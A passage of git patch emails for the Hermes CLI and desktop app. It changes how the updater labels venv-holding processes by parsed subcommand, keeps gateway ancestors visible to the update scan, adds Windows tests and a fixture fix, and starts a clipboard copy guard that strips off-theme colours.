anc_cmdline = " ".join(anc.cmdline() or []) + except Exception: + anc_cmdline = "" + if _is_gw is not None and anc_cmdline and _is_gw(anc_cmdline): + continue skip.add(int(anc.pid)) except Exception: pass @@ -3915,18 +3935,71 @@ def _defer_update_for_self_lock(loaded: list[str]) -> None: _m()._write_update_incomplete_marker() +def _hermes_holder_subcommand(cmdline: str) -> str | None: + """The actual Hermes SUBCOMMAND a venv-holder argv runs, or None. + + Token-based, never substring (#90778: ``kanban --preserve-cache`` + contained \"serve\" and got labeled as the Desktop backend). Finds the + ``hermes_cli.main`` / ``hermes(.exe)`` entry token, then returns the + first following token that is not a flag or a flag's value. Profile + selectors (``--profile X``, ``-p X``) are skipped like the canonical + gateway matcher does. Returns None when no subcommand can be + determined — callers must NOT guess a label in that case. + """ + try: + import shlex + + tokens = shlex.split(cmdline, posix=False) + except Exception: + tokens = cmdline.split() + + entry_idx: int | None = None + for i, token in enumerate(tokens): + low = token.lower().strip('"') + if low.endswith("hermes_cli.main") and i > 0 and tokens[i - 1] == "-m": + entry_idx = i + break + base = low.rsplit("\\", 1)[-1].rsplit("/", 1)[-1] + if base in ("hermes", "hermes.exe"): + entry_idx = i + break + if entry_idx is None: + return None + + value_flags = {"--profile", "-p", "--config", "--model", "--provider"} + i = entry_idx + 1 + while i < len(tokens): + token = tokens[i] + if token in value_flags: + i += 2 + continue + if token.startswith("-"): + i += 1 + continue + return token.lower() + return None + + def _format_venv_python_holders_message(matches: list[tuple[int, str, str]]) -> str: - """Explain which venv processes block the update and how to clear them.""" + """Explain which venv processes block the update and how to clear them. + + Holder labels come from the parsed SUBCOMMAND, never substring matching + (#90778): a standalone ``hermes dashboard`` must not be labeled as the + Desktop backend (advice to close an app that isn't running), and flags + like ``--preserve-cache`` must not match \"serve\". Unknown argv gets no + hint rather than a wrong one. + """ lines = [ "✗ Other Hermes processes are running from this install's venv:", ] + hint_by_subcommand = { + "serve": " ← Hermes backend (if the Desktop app is open, close it)", + "dashboard": " ← hermes dashboard (stop it: hermes dashboard stop, or close that terminal)", + "gateway": " ← gateway", + } for pid, name, cmdline in matches[:6]: - hint = "" - low = cmdline.lower() - if "serve" in low or "dashboard" in low: - hint = " ← Hermes Desktop backend (close the desktop app)" - elif "gateway" in low: - hint = " ← gateway" + sub = _hermes_holder_subcommand(cmdline) + hint = hint_by_subcommand.get(sub or "", "") lines.append(f" PID {pid} {name} {cmdline[:120]}{hint}") if len(matches) > 6: lines.append(f" ... and {len(matches) - 6} more") @@ -3983,9 +4056,23 @@ def _venv_launcher_ancestors(pids: list[int]) -> list[int]: # Never return ourselves or our own ancestry: a CLI ``hermes update`` # runs from the venv python and would otherwise nominate itself. + # Same #87594 carve-out as _detect_venv_python_processes: a GATEWAY + # ancestor is not "our own ancestry" in the interactive sense — it is + # the process the pause machinery must see (the /update-from-gateway + # topology makes the updater the gateway's child). + try: + from gateway.status import looks_like_gateway_command_line as _is_gw + except Exception: + _is_gw = None skip: set[int] = {os.getpid()} try: for anc in psutil.Process().parents(): + try: + anc_cmdline = " ".join(anc.cmdline() or []) + except Exception: + anc_cmdline = "" + if _is_gw is not None and anc_cmdline and _is_gw(anc_cmdline): + continue skip.add(int(anc.pid)) except Exception: pass diff --git a/tests/hermes_cli/test_venv_holder_classifier.py b/tests/hermes_cli/test_venv_holder_classifier.py new file mode 100644 index 0000000000..2b17573d52 --- /dev/null +++ b/tests/hermes_cli/test_venv_holder_classifier.py @@ -0,0 +1,61 @@ +"""Cross-platform unit tests for the venv-holder message classifier (#90778).""" + +import pytest + +from hermes_cli.update_cmd import ( + _format_venv_python_holders_message, + _hermes_holder_subcommand, +) + + +class TestHolderSubcommand: + @pytest.mark.parametrize( + ("cmdline", "expected"), + [ + (r"C:\x\venv\Scripts\python.exe -m hermes_cli.main serve --host 127.0.0.1", "serve"), + (r"C:\x\venv\Scripts\python.exe -m hermes_cli.main dashboard", "dashboard"), + (r"python.exe -m hermes_cli.main gateway run", "gateway"), + # profile selector skipped; its VALUE must not become the subcommand + (r"python -m hermes_cli.main --profile serve gateway run", "gateway"), + (r"python -m hermes_cli.main -p work serve", "serve"), + # 90778: flags containing subcommand words are not subcommands + (r"python -m hermes_cli.main kanban --preserve-cache", "kanban"), + (r"C:\bin\hermes.exe dashboard", "dashboard"), + (r"/usr/local/bin/hermes serve", "serve"), + # no hermes entry at all + (r"python -c import time; time.sleep(3)", None), + # entry but no subcommand + (r"python -m hermes_cli.main", None), + ], + ) + def test_parses_subcommand(self, cmdline, expected): + assert _hermes_holder_subcommand(cmdline) == expected + + +class TestHolderMessage: + def _msg(self, cmdline): + return _format_venv_python_holders_message([(4242, "python.exe", cmdline)]) + + def test_dashboard_not_labeled_desktop_backend(self): + message = self._msg(r"C:\v\Scripts\python.exe -m hermes_cli.main dashboard") + assert "close the desktop app" not in message.lower() + assert "hermes dashboard" in message + + def test_preserve_cache_not_labeled_serve(self): + message = self._msg(r"python -m hermes_cli.main kanban --preserve-cache") + holder_line = next(l for l in message.splitlines() if "PID 4242" in l) + # the holder LINE gets no serve/desktop hint (generic footer text + # legitimately mentions the desktop app) + assert "←" not in holder_line + + def test_serve_gets_backend_hint(self): + message = self._msg(r"python -m hermes_cli.main serve --host 127.0.0.1 --port 0") + assert "Hermes backend" in message + + def test_gateway_hint(self): + message = self._msg(r"python -m hermes_cli.main gateway run") + assert "← gateway" in message + + def test_unknown_argv_gets_no_hint(self): + message = self._msg(r"python -c import this") + assert "←" not in message From 4c922a934881270d9b8ca4e1796dfe3eb6c39b5d Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 15:34:31 -0700 Subject: [PATCH 100/161] test(windows): realistic gateway-parent argv in the #87594 live probe (child code via file, one-line -c) --- .../test_venv_holder_windows_live.py | 33 +++++++++++-------- 1 file changed, 19 insertions(+), 14 deletions(-) diff --git a/tests/hermes_cli/test_venv_holder_windows_live.py b/tests/hermes_cli/test_venv_holder_windows_live.py index 0c9de6f152..b26ea7ebb4 100644 --- a/tests/hermes_cli/test_venv_holder_windows_live.py +++ b/tests/hermes_cli/test_venv_holder_windows_live.py @@ -188,23 +188,28 @@ class TestAncestorExclusion: ancestor-exclusion must not hide the gateway from the scan entirely: the gateway must still be visible to the pause machinery.""" - def test_gateway_parent_visible_to_child_scan(self): - # Simulate the /update topology: parent (fake gateway) spawns a - # child python that runs the REAL detection and reports whether it - # can see its gateway parent. - child_code = ( - "import json, sys\n" + def test_gateway_parent_visible_to_child_scan(self, tmp_path): + # Simulate the /update topology: parent (gateway-argv process) spawns + # a child python that runs the REAL detection and reports whether it + # can see its gateway parent. The child's code lives in a FILE so the + # parent's cmdline stays realistic (a real gateway's argv is clean + # `... -m hermes_cli.main gateway run`, not a multi-line -c blob). + child_file = tmp_path / "child_scan.py" + child_file.write_text( + "import json, os, sys\n" f"sys.path.insert(0, {str(PROJECT_ROOT)!r})\n" "from hermes_cli.update_cmd import _detect_venv_python_processes\n" - "import os\n" "matches = _detect_venv_python_processes()\n" - "print(json.dumps({'ppid': os.getppid(), 'pids': [p for p, _, _ in matches]}))\n" + "print(json.dumps({'ppid': os.getppid()," + " 'pids': [p for p, _, _ in matches]}))\n", + encoding="utf-8", ) - parent_code = ( - "import subprocess, sys\n" - f"out = subprocess.run([sys.executable, '-c', {child_code!r}]," - " capture_output=True, text=True, cwd=" + repr(str(PROJECT_ROOT)) + ")\n" - "print(out.stdout.strip())\n" + parent_oneliner = ( + "import subprocess, sys;" + f" r = subprocess.run([sys.executable, {str(child_file)!r}]," + f" capture_output=True, text=True, cwd={str(PROJECT_ROOT)!r});" + " print(r.stdout.strip());" + " sys.stderr.write(r.stderr[-500:])" ) # The parent's argv carries `gateway run` so it IS a gateway to any # cmdline classifier; it runs the child synchronously. @@ -212,7 +217,7 @@ class TestAncestorExclusion: [ sys.executable, "-c", - parent_code, + parent_oneliner, "-m", "hermes_cli.main", "gateway", From 4d3a61b63b93cadf1d2579fd5c0300419af4d803 Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 15:37:15 -0700 Subject: [PATCH 101/161] =?UTF-8?q?test(windows):=20diagnostics=20in=20the?= =?UTF-8?q?=20#87594=20probe=20=E2=80=94=20parent=20cmdline/exe=20+=20matc?= =?UTF-8?q?her=20verdict?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- tests/hermes_cli/test_venv_holder_windows_live.py | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/tests/hermes_cli/test_venv_holder_windows_live.py b/tests/hermes_cli/test_venv_holder_windows_live.py index b26ea7ebb4..1d9f8a3dac 100644 --- a/tests/hermes_cli/test_venv_holder_windows_live.py +++ b/tests/hermes_cli/test_venv_holder_windows_live.py @@ -199,9 +199,16 @@ class TestAncestorExclusion: "import json, os, sys\n" f"sys.path.insert(0, {str(PROJECT_ROOT)!r})\n" "from hermes_cli.update_cmd import _detect_venv_python_processes\n" + "import psutil\n" + "from gateway.status import looks_like_gateway_command_line\n" + "parent = psutil.Process(os.getppid())\n" + "parent_cmdline = ' '.join(parent.cmdline() or [])\n" "matches = _detect_venv_python_processes()\n" "print(json.dumps({'ppid': os.getppid()," - " 'pids': [p for p, _, _ in matches]}))\n", + " 'pids': [p for p, _, _ in matches]," + " 'parent_cmdline': parent_cmdline," + " 'parent_exe': parent.exe() or ''," + " 'matcher_says_gateway': looks_like_gateway_command_line(parent_cmdline)}))\n", encoding="utf-8", ) parent_oneliner = ( From 8131b0a29fd811448e9a1a8d6011724cdd8dbd49 Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 15:40:10 -0700 Subject: [PATCH 102/161] test(windows): #87594 probe asserts on the gateway ANCESTOR, not the direct parent MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Diagnostic run showed the venv shim makes every spawn a launcher/worker chain: the child's direct parent is its own launcher (python.exe child_scan.py), and the gateway-argv process is the grandparent. The probe now finds the gateway ancestor by argv — the same way the pause machinery would — and asserts THAT pid is visible to the scan. --- .../test_venv_holder_windows_live.py | 24 +++++++++++-------- 1 file changed, 14 insertions(+), 10 deletions(-) diff --git a/tests/hermes_cli/test_venv_holder_windows_live.py b/tests/hermes_cli/test_venv_holder_windows_live.py index 1d9f8a3dac..abad856e74 100644 --- a/tests/hermes_cli/test_venv_holder_windows_live.py +++ b/tests/hermes_cli/test_venv_holder_windows_live.py @@ -201,14 +201,14 @@ class TestAncestorExclusion: "from hermes_cli.update_cmd import _detect_venv_python_processes\n" "import psutil\n" "from gateway.status import looks_like_gateway_command_line\n" - "parent = psutil.Process(os.getppid())\n" - "parent_cmdline = ' '.join(parent.cmdline() or [])\n" + "# The venv shim makes every spawn a launcher/worker CHAIN, so the\n" + "# gateway is an ANCESTOR, not necessarily the direct parent —\n" + "# find it the same way the pause machinery would: by argv.\n" + "gw = [int(a.pid) for a in psutil.Process().parents()\n" + " if looks_like_gateway_command_line(' '.join(a.cmdline() or []))]\n" "matches = _detect_venv_python_processes()\n" - "print(json.dumps({'ppid': os.getppid()," - " 'pids': [p for p, _, _ in matches]," - " 'parent_cmdline': parent_cmdline," - " 'parent_exe': parent.exe() or ''," - " 'matcher_says_gateway': looks_like_gateway_command_line(parent_cmdline)}))\n", + "print(json.dumps({'gateway_ancestors': gw," + " 'pids': [p for p, _, _ in matches]}))\n", encoding="utf-8", ) parent_oneliner = ( @@ -240,9 +240,13 @@ class TestAncestorExclusion: line = result.stdout.strip().splitlines()[-1] if result.stdout.strip() else "{}" payload = json.loads(line) assert payload, f"child scan produced no output: {result.stderr[-500:]}" - # The gateway parent must be visible to the scan so the pause - # machinery can stop it (#87594). Plain ancestor-exclusion hides it. - assert payload["ppid"] in payload["pids"], ( + assert payload["gateway_ancestors"], ( + f"harness broke: no gateway-argv ancestor found: {payload}" + ) + # The gateway ancestor must be visible to the scan so the pause + # machinery can stop it (#87594). Blanket ancestor-exclusion hid it. + visible = set(payload["gateway_ancestors"]) & set(payload["pids"]) + assert visible, ( "gateway ancestor invisible to venv scan — /update from the " f"gateway can never pause it (#87594): {payload}" ) From 7d6db4efb885856078e4d19f804035226df81e0d Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 16:31:15 -0700 Subject: [PATCH 103/161] fix(update): holder classifier derives value-flags from the real parser; de-flake goal-resume fixture MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Review on #91869 (@andrexibiza): the handwritten value_flags subset misparsed '--reasoning high serve' as subcommand 'high' and '-m dashboard serve' as 'dashboard' — recreating the wrong-hint class. _holder_value_flags() now introspects build_top_level_parser() (every option with nargs != 0, plus the pre-argparse profile selectors), with a static fallback for broken-tree updates, --flag=value handled. Regressions for --reasoning/-m/-t/--model=/-c per review. De-flake test_goal_resume_restart: the fixture only set the HERMES_HOME env var, but get_hermes_home() prefers the context-local override — an override leaked by any earlier test in the xdist worker pointed the goals DB at a dead tmp dir and resume enqueued nothing (the CI-only red). Fixture now pins the override via set/reset_hermes_home_override. Mechanism proven both ways: env-only fixture cannot beat a leaked override; pinned fixture immune. --- hermes_cli/update_cmd.py | 50 +++++++++++++++++-- tests/gateway/test_goal_resume_restart.py | 15 ++++++ .../hermes_cli/test_venv_holder_classifier.py | 9 ++++ 3 files changed, 71 insertions(+), 3 deletions(-) diff --git a/hermes_cli/update_cmd.py b/hermes_cli/update_cmd.py index 4ad10d8d58..1144400025 100644 --- a/hermes_cli/update_cmd.py +++ b/hermes_cli/update_cmd.py @@ -3935,6 +3935,49 @@ def _defer_update_for_self_lock(loaded: list[str]) -> None: _m()._write_update_incomplete_marker() +_HOLDER_VALUE_FLAGS_FALLBACK = frozenset( + { + "--profile", "-p", "--config", + "--model", "-m", "--provider", "--reasoning", + "--toolsets", "-t", "--skills", "-s", + "--continue", "-c", "--resume", "-r", + "--oneshot", "-z", "--in", "--usage-file", + } +) +_holder_value_flags_cache: frozenset | None = None + + +def _holder_value_flags() -> frozenset: + """Top-level CLI flags that consume a value — derived from the REAL parser. + + Introspects ``build_top_level_parser()`` (every option with nargs != 0) + so the holder classifier can never drift from the argparse surface + (#91869 review: a handwritten subset misparsed ``--reasoning high + serve`` as subcommand ``high`` and ``-m dashboard serve`` as + ``dashboard`` — recreating the wrong-hint class). The pre-argparse + profile selectors (``--profile``/``-p``, ``--config``) are added + explicitly since they are stripped before argparse sees argv. Falls + back to a static snapshot when the parser cannot be imported (the + updater must classify holders even mid-upgrade on a broken tree). + Cached per process. + """ + global _holder_value_flags_cache + if _holder_value_flags_cache is not None: + return _holder_value_flags_cache + flags: set[str] = {"--profile", "-p", "--config"} + try: + from hermes_cli._parser import build_top_level_parser + + parser = build_top_level_parser()[0] + for action in parser._actions: + if action.option_strings and action.nargs != 0: + flags.update(action.option_strings) + _holder_value_flags_cache = frozenset(flags) + except Exception: + _holder_value_flags_cache = _HOLDER_VALUE_FLAGS_FALLBACK + return _holder_value_flags_cache + + def _hermes_holder_subcommand(cmdline: str) -> str | None: """The actual Hermes SUBCOMMAND a venv-holder argv runs, or None. @@ -3966,12 +4009,13 @@ def _hermes_holder_subcommand(cmdline: str) -> str | None: if entry_idx is None: return None - value_flags = {"--profile", "-p", "--config", "--model", "--provider"} + value_flags = _holder_value_flags() i = entry_idx + 1 while i < len(tokens): token = tokens[i] - if token in value_flags: - i += 2 + if token in value_flags or token.split("=", 1)[0] in value_flags: + # --flag value consumes two tokens; --flag=value consumes one. + i += 1 if "=" in token else 2 continue if token.startswith("-"): i += 1 diff --git a/tests/gateway/test_goal_resume_restart.py b/tests/gateway/test_goal_resume_restart.py index bc7efa7745..7b9be97ad3 100644 --- a/tests/gateway/test_goal_resume_restart.py +++ b/tests/gateway/test_goal_resume_restart.py @@ -34,8 +34,23 @@ def hermes_home(tmp_path, monkeypatch): home.mkdir() monkeypatch.setattr(Path, "home", lambda: tmp_path) monkeypatch.setenv("HERMES_HOME", str(home)) + # get_hermes_home() prefers the context-local override over the env + # var, so a set_hermes_home_override() leaked by ANY earlier test in + # this xdist worker would silently point the goals DB at a dead tmp + # dir and make resume enqueue nothing (CI-only flake). Pin the + # override to THIS home so the fixture is immune to leaks. + from hermes_constants import ( + reset_hermes_home_override, + set_hermes_home_override, + ) + + token = set_hermes_home_override(str(home)) goals._DB_CACHE.clear() yield home + try: + reset_hermes_home_override(token) + except Exception: + pass goals._DB_CACHE.clear() diff --git a/tests/hermes_cli/test_venv_holder_classifier.py b/tests/hermes_cli/test_venv_holder_classifier.py index 2b17573d52..ebba2f4d8c 100644 --- a/tests/hermes_cli/test_venv_holder_classifier.py +++ b/tests/hermes_cli/test_venv_holder_classifier.py @@ -20,6 +20,15 @@ class TestHolderSubcommand: (r"python -m hermes_cli.main -p work serve", "serve"), # 90778: flags containing subcommand words are not subcommands (r"python -m hermes_cli.main kanban --preserve-cache", "kanban"), + # 91869 review: EVERY top-level value flag must be skipped — + # a flag VALUE equal to a subcommand must not become the label + (r"python -m hermes_cli.main --reasoning high serve", "serve"), + (r"python -m hermes_cli.main -m dashboard serve", "serve"), + (r"python -m hermes_cli.main -t browser,files gateway run", "gateway"), + (r"python -m hermes_cli.main --model=dashboard serve", "serve"), + # -c consumes ONE value token; later bare tokens are (harmless, + # unhinted) subcommand candidates — pin that shape honestly + (r"python -m hermes_cli.main -c mysession serve", "serve"), (r"C:\bin\hermes.exe dashboard", "dashboard"), (r"/usr/local/bin/hermes serve", "serve"), # no hermes entry at all From 3cc7f220cdd2e38f50e3caa05782259c3d3c0cde Mon Sep 17 00:00:00 2001 From: SHL0MS Date: Fri, 21 Aug 2026 23:12:04 -0400 Subject: [PATCH 104/161] fix(desktop): strip off-scheme paint from selection copies MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Chromium's native selection copy serializes the selection as text/html with every element's computed color inlined. Copied from a dark theme, body text lands on the clipboard as near-white (the app ink computes to color(srgb 0.902 0.929 0.953 / 0.94)); pasted into a light-background target such as an email, it is invisible. The renderer never writes rich text itself, so this payload can only come from Chromium's serializer — which runs after copy handlers decline, meaning clipboardData reads back empty inside the event. The new guard therefore decides from the live DOM: it scores the computed ink of the selected text against the rendered theme mode, and only when they are opposite schemes does it own the payload, writing text/plain plus a tag-structured text/html with no paint declarations. Structure (headings, lists, tables, links, bold/italic, code layout) survives; colors come from the paste target's defaults. A generic font-family anchor (sans-serif, monospace inside code) keeps receivers that convert HTML to rich text on their own compose font instead of the Times browser default. Same-scheme copies and selections starting inside editable fields pass through untouched. --- .../src/lib/selection-copy-colors.test.ts | 301 ++++++++++++++++ apps/desktop/src/lib/selection-copy-colors.ts | 329 ++++++++++++++++++ apps/desktop/src/main.tsx | 5 + 3 files changed, 635 insertions(+) create mode 100644 apps/desktop/src/lib/selection-copy-colors.test.ts create mode 100644 apps/desktop/src/lib/selection-copy-colors.ts diff --git a/apps/desktop/src/lib/selection-copy-colors.test.ts b/apps/desktop/src/lib/selection-copy-colors.test.ts new file mode 100644 index 0000000000..54e3d4f3f1 --- /dev/null +++ b/apps/desktop/src/lib/selection-copy-colors.test.ts @@ -0,0 +1,301 @@ +import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest' + +import { + installSelectionCopyColorGuard, + selectionInkLuma, + serializeSelectionStructure, + textColorLuma +} from './selection-copy-colors' + +function makeCopyEvent(): { event: ClipboardEvent; setData: ReturnType; preventDefault: ReturnType } { + const event = new Event('copy', { bubbles: true, cancelable: true }) as ClipboardEvent + const setData = vi.fn() + const preventDefault = vi.fn() + + Object.defineProperty(event, 'clipboardData', { value: { setData } }) + Object.defineProperty(event, 'preventDefault', { value: preventDefault }) + + return { event, setData, preventDefault } +} + +/** Stage styled text and arm a real DOM selection over it. */ +function armSelection(html: string): HTMLDivElement { + const host = document.createElement('div') + + host.innerHTML = html + document.body.append(host) + + const range = document.createRange() + + range.selectNodeContents(host) + + const sel = window.getSelection() + + sel?.removeAllRanges() + sel?.addRange(range) + + return host +} + +describe('textColorLuma', () => { + it('scores white near the top of the range', () => { + expect(textColorLuma('rgb(255, 255, 255)')).toBeGreaterThan(240) + }) + + it('scores black near the bottom of the range', () => { + expect(textColorLuma('rgb(10, 10, 10)')).toBeLessThan(20) + }) + + it('composites partial alpha over mid-gray', () => { + // White at 50% alpha lands halfway between white and gray. + const halfWhite = textColorLuma('rgba(255, 255, 255, 0.5)') + + expect(halfWhite).not.toBeNull() + expect(halfWhite!).toBeGreaterThan(185) + expect(halfWhite!).toBeLessThan(200) + }) + + it('treats fully transparent paint as invisible', () => { + expect(textColorLuma('rgba(255, 255, 255, 0)')).toBeNull() + expect(textColorLuma('rgba(255, 255, 255, 0.03)')).toBeNull() + }) + + it('returns null for unparsable colors', () => { + expect(textColorLuma('var(--foreground)')).toBeNull() + expect(textColorLuma('inherit')).toBeNull() + expect(textColorLuma('')).toBeNull() + }) + + it('parses the color(srgb …) computed form Chromium serializes', () => { + // The app's dark-theme ink: color-mix(in srgb, #e6edf3 94%, transparent) + // computes to exactly this serialization. + const luma = textColorLuma('color(srgb 0.901961 0.929412 0.952941 / 0.94)') + + expect(luma).not.toBeNull() + expect(luma!).toBeGreaterThan(220) + }) + + it('parses color(srgb …) with percentage components and alpha', () => { + const luma = textColorLuma('color(srgb 100% 100% 100% / 50%)') + + expect(luma).not.toBeNull() + expect(luma!).toBeCloseTo(191.5, 0) + }) + + it('parses hex colors including alpha', () => { + expect(textColorLuma('#ffffff')).toBeGreaterThan(240) + expect(textColorLuma('#111111')).toBeLessThan(20) + expect(textColorLuma('#ffffff80')).not.toBeNull() + }) +}) + +describe('selectionInkLuma', () => { + afterEach(() => { + window.getSelection()?.removeAllRanges() + }) + + it('scores the live computed ink of the selected text', () => { + const host = armSelection('

bright transcript ink

') + const luma = selectionInkLuma(window.getSelection()!, document) + + expect(luma).not.toBeNull() + expect(luma!).toBeGreaterThan(220) + + host.remove() + }) + + it('scores dark ink as dark', () => { + const host = armSelection('

dim transcript ink

') + const luma = selectionInkLuma(window.getSelection()!, document) + + expect(luma).not.toBeNull() + expect(luma!).toBeLessThan(20) + + host.remove() + }) + + it('returns null for a collapsed selection', () => { + const host = armSelection('

text

') + + window.getSelection()?.collapseToEnd() + + expect(selectionInkLuma(window.getSelection()!, document)).toBeNull() + + host.remove() + }) +}) + +describe('serializeSelectionStructure', () => { + afterEach(() => { + window.getSelection()?.removeAllRanges() + }) + + it('keeps semantic structure and hrefs while dropping paint and classes', () => { + const host = armSelection( + '

see the doc and this

' + ) + + const html = serializeSelectionStructure(window.getSelection()!, document) + + expect(html).toContain('this') + expect(html).toContain('href="https://example.com"') + expect(html).toContain('the doc') + // The only style attribute allowed is the wrapper's generic font anchor. + expect(html.replace('
', '')).not.toContain('style=') + expect(html).not.toContain('class=') + expect(html).not.toContain('rgb(230, 237, 243)') + + host.remove() + }) + + it('keeps list and code structure', () => { + const host = armSelection('
  • alpha
  • beta
code line
') + const html = serializeSelectionStructure(window.getSelection()!, document) + + expect(html).toContain('
  • alpha
  • ') + expect(html).toContain('beta') + expect(html).toContain('code line') + + host.remove() + }) + + it('anchors a generic sans family so rich-text receivers keep their own font', () => { + const host = armSelection('

    plain prose

    ') + const html = serializeSelectionStructure(window.getSelection()!, document) + + // Generic family on the wrapper: resolves to each platform's own face, + // never the Times browser default, and carries no vendor font names. + expect(html).toContain('sans-serif') + expect(html).not.toContain('-apple-system') + expect(html).not.toContain('color') + + host.remove() + }) + + it('pins monospace inside code elements', () => { + const host = armSelection('
    npm run build
    ') + const html = serializeSelectionStructure(window.getSelection()!, document) + + expect(html).toContain('monospace') + + host.remove() + }) +}) + +describe('installSelectionCopyColorGuard', () => { + beforeEach(() => { + document.documentElement.dataset.hermesMode = 'dark' + }) + + afterEach(() => { + delete document.documentElement.dataset.hermesMode + window.getSelection()?.removeAllRanges() + }) + + it('owns the payload when a light-ink selection is copied under a dark theme', () => { + const dispose = installSelectionCopyColorGuard(document) + const host = armSelection('

    bright transcript ink

    ') + + try { + const { event, setData, preventDefault } = makeCopyEvent() + + document.body.dispatchEvent(event) + + expect(preventDefault).toHaveBeenCalled() + + const plainCall = setData.mock.calls.find(([type]) => type === 'text/plain') + const htmlCall = setData.mock.calls.find(([type]) => type === 'text/html') + + expect(plainCall?.[1]).toContain('bright transcript ink') + expect(htmlCall?.[1]).toContain('bright transcript ink') + expect(htmlCall?.[1]).not.toContain('rgb(230, 237, 243)') + } finally { + dispose() + host.remove() + } + }) + + it('leaves dark-ink selections to Chromium under a dark theme', () => { + const dispose = installSelectionCopyColorGuard(document) + const host = armSelection('

    dim transcript ink

    ') + + try { + const { event, setData, preventDefault } = makeCopyEvent() + + document.body.dispatchEvent(event) + + expect(preventDefault).not.toHaveBeenCalled() + expect(setData).not.toHaveBeenCalled() + } finally { + dispose() + host.remove() + } + }) + + it('leaves light-ink selections alone when the theme is light', () => { + document.documentElement.dataset.hermesMode = 'light' + + const dispose = installSelectionCopyColorGuard(document) + const host = armSelection('

    bright transcript ink

    ') + + try { + const { event, setData, preventDefault } = makeCopyEvent() + + document.body.dispatchEvent(event) + + expect(preventDefault).not.toHaveBeenCalled() + expect(setData).not.toHaveBeenCalled() + } finally { + dispose() + host.remove() + } + }) + + it('skips selections that start inside an editable field', () => { + const dispose = installSelectionCopyColorGuard(document) + const host = document.createElement('div') + + host.setAttribute('contenteditable', 'true') + host.innerHTML = 'composer text' + document.body.append(host) + + const range = document.createRange() + + range.selectNodeContents(host) + + const sel = window.getSelection() + + sel?.removeAllRanges() + sel?.addRange(range) + + try { + const { event, setData, preventDefault } = makeCopyEvent() + + document.body.dispatchEvent(event) + + expect(preventDefault).not.toHaveBeenCalled() + expect(setData).not.toHaveBeenCalled() + } finally { + dispose() + host.remove() + } + }) + + it('stops intercepting after disposal', () => { + const dispose = installSelectionCopyColorGuard(document) + const host = armSelection('

    bright transcript ink

    ') + + dispose() + + try { + const { event, setData, preventDefault } = makeCopyEvent() + + document.body.dispatchEvent(event) + + expect(preventDefault).not.toHaveBeenCalled() + expect(setData).not.toHaveBeenCalled() + } finally { + host.remove() + } + }) +}) diff --git a/apps/desktop/src/lib/selection-copy-colors.ts b/apps/desktop/src/lib/selection-copy-colors.ts new file mode 100644 index 0000000000..de9d63b9a4 --- /dev/null +++ b/apps/desktop/src/lib/selection-copy-colors.ts @@ -0,0 +1,329 @@ +// Chromium's native selection copy (Cmd+C, right-click Copy) serializes the +// selection as `text/html` with every element's COMPUTED paint inlined as +// style attributes. Copied from a dark theme, body text lands on the +// clipboard near-white; pasted into a light-background target (an email, a +// shared doc) it is invisible. +// +// The serializer only runs AFTER `copy` handlers decline to intercept — +// inside the handler, `clipboardData` reads back empty — so the guard cannot +// inspect or patch Chromium's payload. Instead it decides from the LIVE DOM: +// it scores the ink that paints the current selection against the theme +// Hermes is rendering, and when the two are opposite schemes it takes over +// the clipboard write entirely, emitting `text/plain` plus a tag-structured +// `text/html` with no paint declarations. Structure — headings, lists, +// tables, links, bold/italic, code layout — survives; colors come from the +// paste target's own defaults. Same-scheme selections are left to Chromium's +// default copy untouched. + +type RenderedMode = 'light' | 'dark' + +/** At or above this perceived luma, text reads as "light" (dark-theme ink). */ +const LIGHT_TEXT_LUMA_MIN = 150 +/** At or below this perceived luma, text reads as "dark" (light-theme ink). */ +const DARK_TEXT_LUMA_MAX = 105 + +/** Upper bound on text nodes probed per copy; long selections stay O(50). */ +const MAX_PROBE_NODES = 50 + +const RGB_FN_RE = /rgba?\(\s*([\d.]+)\s*[,\s]\s*([\d.]+)\s*[,\s]\s*([\d.]+)\s*(?:[/,]\s*([\d.%]+)\s*)?\)/i +const SRGB_FN_RE = /^color\(\s*srgb\s+([\d.]+%?)\s+([\d.]+%?)\s+([\d.]+%?)(?:\s*[/\s]+\s*([\d.%]+))?\s*\)$/i +const HEX_RE = /^#([0-9a-f]{3,4}|[0-9a-f]{6}|[0-9a-f]{8})$/i + +/** Parse one component: percentage or 0–255 integer. */ +const channelValue = (raw: string): number => { + const v = raw.trim() + + return v.endsWith('%') ? (Number.parseFloat(v) / 100) * 255 : Number.parseFloat(v) +} + +/** color(srgb …) components are 0–1 floats (or percentages), not 0–255. */ +const srgbChannelValue = (raw: string): number => { + const v = raw.trim() + + return v.endsWith('%') ? (Number.parseFloat(v) / 100) * 255 : Number.parseFloat(v) * 255 +} + +const alphaValue = (raw: string): number => + raw.endsWith('%') ? Number.parseFloat(raw) / 100 : Number.parseFloat(raw) + +function expandHex(hex: string): [number, number, number, number] | null { + const h = hex.slice(1) + const wide = h.length >= 6 + + const pick = (i: number) => Number.parseInt(wide ? h.slice(i, i + 2) : h[i]! + h[i]!, 16) + + const r = pick(0) + const g = pick(1 * (wide ? 2 : 1)) + const b = pick(2 * (wide ? 2 : 1)) + + if ([r, g, b].some(Number.isNaN)) { + return null + } + + const aRaw = wide ? h.slice(6, 8) : h[3] + + return [r, g, b, aRaw ? Number.parseInt(aRaw, 16) / 255 : 1] +} + +function parseCssColor(cssColor: string): { r: number; g: number; b: number; alpha: number } | null { + const value = cssColor.trim() + + const rgb = value.match(RGB_FN_RE) + + if (rgb) { + return { + r: Number(rgb[1]), + g: Number(rgb[2]), + b: Number(rgb[3]), + alpha: rgb[4] ? alphaValue(rgb[4]) : 1 + } + } + + const srgb = value.match(SRGB_FN_RE) + + if (srgb) { + return { + r: srgbChannelValue(srgb[1] ?? ''), + g: srgbChannelValue(srgb[2] ?? ''), + b: 